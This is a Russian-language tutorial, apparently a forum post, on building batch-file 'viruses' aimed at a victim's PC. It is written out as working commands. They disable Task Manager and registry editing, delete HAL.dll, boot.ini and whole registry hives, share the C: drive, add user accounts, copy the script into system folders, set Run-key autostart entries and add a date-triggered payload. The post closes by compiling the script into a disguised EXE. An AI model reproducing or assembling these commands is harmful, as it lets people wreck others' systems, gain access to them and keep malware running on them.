В этой статье я раскажу о bat вирусах и как создать такие вирусы итак начнём:Чтобы вирус запустился, нам нужны:
1) права администратора на компьютере жертвы
2) (желательно) Windows XP SP3 или старее на компьютере жертвы Создаем файл .BAT, открываем в Notepad++ или другом редакторе и пишем, заведомо наслаждаясь местью… Пишем. Для начала включим режим Безпалевности: @echo off cmd /c Теперь думаем: что будет делать вирус.
Есть огромное число вариантов: МОЖНО ПОШУТИТЬ Запретить диспетчер задач reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f ------------------------------------------------------------------------------------------------------------------------------------------------------
Удалить обои
del "%systemroot%\Web\Wallpaper\*.jpg" Убрать рабочий стол
taskkill /f /im explorer.exe
------------------------------------------------------------------------------------------------------------------------------------------------------
Убрать панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
------------------------------------------------------------------------------------------------------------------------------------------------------
Запретить изменять и читать реестр
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
------------------------------------------------------------------------------------------------------------------------------------------------------
Убрать значки рабочего стола
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
------------------------------------------------------------------------------------------------------------------------------------------------------
Отключить комп
shutdown -s -t 1 -c -f
------------------------------------------------------------------------------------------------------------------------------------------------------
Перезагрузить комп
shutdown -r -t 1 -c -f
------------------------------------------------------------------------------------------------------------------------------------------------------
Самоликвидироваться
del %0
------------------------------------------------------------------------------------------------------------------------------------------------------
Создать учетную запись (поставьте своё)
net user Имя_юзера /add
------------------------------------------------------------------------------------------------------------------------------------------------------
Поменять название корзинки (поставьте своё)
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ
/d Помойка ламера /F
------------------------------------------------------------------------------------------------------------------------------------------------------
Поменять название харда (поставьте своё)
label %новая_метка% Хард лоха
------------------------------------------------------------------------------------------------------------------------------------------------------
Вынести жестянку на паблик (диск в общий доступ, поставьте своё)
net share qwert$=c:\
------------------------------------------------------------------------------------------------------------------------------------------------------
А МОЖНО СНЕСТИ ВИНДУ!
Удалить ядро системы:del %systemroot%\system32\HAL.dll
Удалить конфигурацию загрузки ОС: attrib -h -s c:\boot.ini del c:\boot.ini
Удалить основные разделы реестра (можно использовать по отдельности): reg delete HKLM\Software /f reg delete HKCU\Software /f
------------------------------------------------------------------------------------------------------------------------------------------------------
МОЖНО ПОСТАВИТЬ ТИХОЕ СИДЕНИЕ В СИСТЕМЕ… Подождать до такого-то числа (поставьте свою дату) rem === Здесь проверяется дата === if %date% GEQ 30.09.2011 goto m goto c :m rem === Здесь начинается вирус === echo Это вирус)))) echo Надеюсь, вы не полные дураки, echo чтобы оставить эти строки))) rem === Если рано, спокойно завершаемся... === :c exit------------------------------------------------------------------------------------------------------------------------------------------------------
МОЖНО РАЗМНОЖИТЬСЯ ПО СИСТЕМНЫМ ПАПКАМ И ДОБАВИТЬСЯ В AUTORUN Саморазмножение copy /y %0 %windir% copy /y %0 %windir%\system32\drivers\ copy /y %0 %systemroot%\ copy /y %0 %systemdrive%\
Добавляемся в автозагрузку reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %0 >nul reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %windir%\autoexec.bat >nul reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %windir%\system32\drivers\autoexec.bat >nul reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v %random% /t REG_SZ /f /d %systemdrive%\autoexec.bat >nul------------------------------------------------------------------------------------------------------------------------------------------------------ И это далеко не все… Теперь собираем в EXE файл. Можем создать иконку для вируса, создав, называем её icon.ico и помещаем в папку с вирусом, переименованным в autoexec.bat. Качаем эту утилиту и распаковываем VirGen.exe в папку с вирусом и иконкой. Запускаем VirGen.exe, он компилирует наш BATник в EXEшник. Все!
| 
